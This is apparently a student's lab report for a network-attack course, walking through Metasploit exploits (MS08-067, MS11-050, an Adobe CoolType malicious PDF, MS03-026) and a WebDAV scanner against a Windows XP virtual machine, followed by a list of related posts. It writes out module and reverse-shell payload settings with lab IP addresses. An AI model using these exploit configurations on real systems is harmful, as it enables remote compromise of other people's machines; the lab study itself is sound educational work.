20155229《网络对抗技术》Exp5:MSF基础应用
实验内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
一个主动攻击实践,如ms08-067;
一个针对浏览器的攻击,如ms11-050;
一个针对客户端的攻击,如Adobe;
成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。
主动攻击实践 MS08-067漏洞
msfconsole
进入msf控制台search ms08_067
查看该漏洞
use exploit/windows/smb/ms08_067_netapi
使用该漏洞show payloads
回链攻击载荷set payload generic/shell_reverse_tcp
tcp反向回连set LHOST 192.168.126.128
攻击机的ip地址set LPORT 5229
攻击的端口set RHOST 192.168.126.136
靶机的ip地址set target 0
选择目标系统类型exploit
进行攻击下图中展现了攻击成功
- 在kali中输入
ipconfig
查看靶机的ip地址
- 在XP中查看靶机的ip地址,两者相比较,完全一样。
针对浏览器的攻击 ms11_050
进入
msfconsole
控制台输入
use windows/browser/ms11_050_mshtml_cobjectelement
命令使用ms11_050漏洞输入
set payload windows/meterpreter/reverse_http
命令使用http反向连接设置kali的IP地址
set LHOST 192.168.126.128
设置端口
set LPORT 5229
设置资源标识符路径
set URIPATH fyh5229
进行攻击
exploit
将上图的LOCAL IP 的网址输入进WIN XP中的IE浏览器中,出现遇到问题需要关闭
的窗口。同时360已经给出需要修复的通知。
但是回到KALI建立会话时,IE浏览器已经关闭该网页。
设置浏览器的选项,将安全等级设为最低,且启动了插件设置,但是,会话连接还是失败。。。
会接着研究这个问题的
针对客户端的攻击 Adobe
输入
msfconsole
进入msf控制台输入
search adobe
查找和adobe相关的漏洞我选择了
windows/fileformat/adobe_cooltype_sing
输入
set payload windows/meterpreter/reverse_tcp
使用tcp反向连接设置IP地址及端口号
输入
set FILENAME 5229.pdf
命令生成pdf文件进行攻击
- 下图为成功生成PDF文件的标志。
- 根据存储路径,找到PDF文件并将其放进靶机里。
- 但我找了很久都没有找到该文件,后来,如下图,选择
显示隐藏文件
,这时就能找到隐藏的文件夹了。
- 我先将改文件复制进了我的主机中,立马被360删除了。
- 在msf中进入监听模式
set payload windows/meterpreter/reverse_tcp
tcp反向连接- 设置ip地址和端口号
- 进行攻击
- 在XP上打开5229.pdf文件,kali中显示攻击成功
- 输入ipconfig,显示的是xp的ip地址,证明攻击正确。
辅助模块 webdav
webdav: WebDAV 一种基于 HTTP 1.1协议的通信协议。由于 WebDAV 已与 Windows XP 和 IIS 集成,因此它具有这两者所提供的安全特性。其中包括 Internet 信息服务管理单元中指定的 IIS 权限和 NTFS 文件系统中的自由选择访问控制列表 (DACL)。
- 进入msf控制台
- 使用
show auxiliary
命令显示所有的辅助模块以及他们的用途。
- 选择
scanner/http/webdav_scanner
show options
查看该漏洞的配置选项
- 设置了kali的ip地址和线程
- 进行攻击
- 攻击的结果如上图所示,但是该靶机没有装IIS。
- 参考WindowsXP系统如何启用IIS安装IIS
- 允许
webdav
,再次进行攻击,会得到[*] 192.168.126.128 (Microsoft-IIS/6.0) has WEBDAV ENABLED
的消息。
RPC接口长主机名远程缓冲区溢出漏洞(MS03-026)
Remote Procedure Call (RPC)是Windows操作系统使用的一种远程过程调用协议,RPC提供进程间交互通信机制,允许在某台计算机上运行的程序无缝地在远程系统上执行代码。
使用
use exploit/windows/dcerpc/ms03_026_dcom
使用
set payload windows/shell_bind_tcp
tcp反向连接show options 查看该漏洞的配置选项
set LHOST 192.168.126.128 设置主机ip
set RHOST 192.168.126.137 设置反弹shell的ip
- 进行攻击,攻击成功,但是没办法建立会话。
"无会话已创建"消息发生的情况:
① 使用的漏洞利用对所选择的目标不起作用。可以
是一个不同版本的漏洞,或目标配置有问题。
② 您使用的漏洞利用被配置为使用不创建的有效载荷
互动会话。
根据以上提示,
show options
中显示Windows NT SP3-6a/2000/XP/2003 Universal
都可以使用,检测了自己的虚拟机,且使用Microsoft Windows XP Professional
和Microsoft Windows XP Professional SP2
两个版本的虚拟机,都无法建立会话。检查了所攻击的漏洞,无误。
因为该漏洞与RPC协议还有远程有关,所以我分别打开了虚拟机中的WindowsXP系统安全设置:关闭远程协助和服务(关闭的地方换成打开) 和 XP上显示 ‘RPC 服务器不可用’是什么意思但是还是无法建立会话。
好了,我真的是没法解决这个问题了。。。
实验后问题回答
用自己的话解释什么是exploit,payload,encode.
exploit
英文翻译为利用
,黑客就是利用漏洞对电脑进行攻击,有漏洞不一定可以利用,但可以利用的一定有漏洞。payload
:有效载荷。通常在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,而其中的原始数据就是payloadencode
:编码器,用来给payload进行编码,保护payload不被发现
实验总结与体会
这次实验其实不难,但是不代表每次攻击都能成功,也不代表每次攻击都能成功建立会话,我做了好几个实验,成功的占少数,还有些失败的我没写上来。
虽然失败的占多数,但无疑这次实验通过自己查找资料学习漏洞学到了很多知识。
20155229《网络对抗技术》Exp5:MSF基础应用的更多相关文章
- 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础
2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155232《网络对抗》Exp5 MSF基础应用
20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...
- 20155302《网络对抗》Exp5 MSF基础应用
20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...
- 20155323刘威良《网络对抗》Exp5 MSF基础应用
20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...
- 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用
20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验 (首用) 渗透实验三:Adobe ...
- 20145215《网络对抗》Exp5 MSF基础应用
20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...
- 20145208 蔡野 《网络对抗》Exp5 MSF基础应用
20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...
- 20145311王亦徐 《网络对抗技术》 MSF基础应用
20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...
- 20145325张梓靖 《网络对抗技术》 MSF基础应用
20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...
随机推荐
- 只有mdf文件的恢复方法
EXEC sp_attach_single_file_db @dbname = 'AdventureWorksDW2012_Data',@physname = 'D:\Program Files (x ...
- 分享一个 jsPDF的简单使用以及中文编码问题的解决
后台一个下载文件中内容国际化问题的坑甩到了前端 前端自己匹配,自己处理国际化,生成文件下载 jsPDF-AutoTable 挺靠谱 中文乱码, 还是好人多啊 解决方式如下文章 jsPDF的简单使 ...
- Mongodb的入门(6)副本集
Mongodb的副本集:(有两种情况,主从复制,副本集) 这次我来说一下mongodb的副本集,副本集的出现可以有效的保证mongodb的单点问题,对数据的稳健性有一定辅助作用: MongoDB复制: ...
- CSS 小结笔记之伸缩布局 (flex)
CSS flex 是一种伸缩布局,之前块级元素布局在同一行,可以通过display或position或float来实现,而本篇介绍一个新的方法——flex(弹性布局). flex 为和模型布局提供了极 ...
- ECMAScript5新特性总结
虽然ECMAScript5早就成为标准推出来了,但之前因为一直用的是ECMAScript3,并且工作中总是要求兼容IE的低版本,所以用的比较少.如今市场上大多数浏览器都能兼容ECMAScript5(I ...
- 回归JavaScript基础(十)
主题:创建对象 原型模式 JavaScript中的每个对象都有一个prototype属性(原型属性),这个属性是一个指针,指向一个对象,而这个对象可以由一些属性和方法组成.被指向的对象,可以是多个对象 ...
- mysql的几个知识点
常用命令 原则:能用可视化工具的尽量使用工具,命令行仅限于问题排查. mysql -u ACCOUNT -pPWD -h IP -P port [-D database] //连接数据库 show d ...
- 无法获取链接服务器 "XXX" 的 OLE DB 访问接口 "SQLNCLI10" 的架构行集 "DBSCHEMA_TABLES_INFO"。该访问接口支持该接口,但使用该接口时返回了失败代码。
1. SQL 2000 下载补丁 SQL2KSP4 ,进行安装 2.找到SQL2KSP4\install\instcat.sql 并在sql2000 中打开查询分析器中执行
- Python实例---模拟微信网页登录(day2)
第三步: 实现长轮询访问服务器---day2代码 settings.py """ Django settings for weixin project. Generate ...
- 使用ubuntu过程中遇到的问题汇总
使用ubuntu过程中遇到的问题汇总 1.使用图形界面设置免密码登录之后,改回密码登陆失效 解决方案: https://askubuntu.com/questions/211084/how-do-i- ...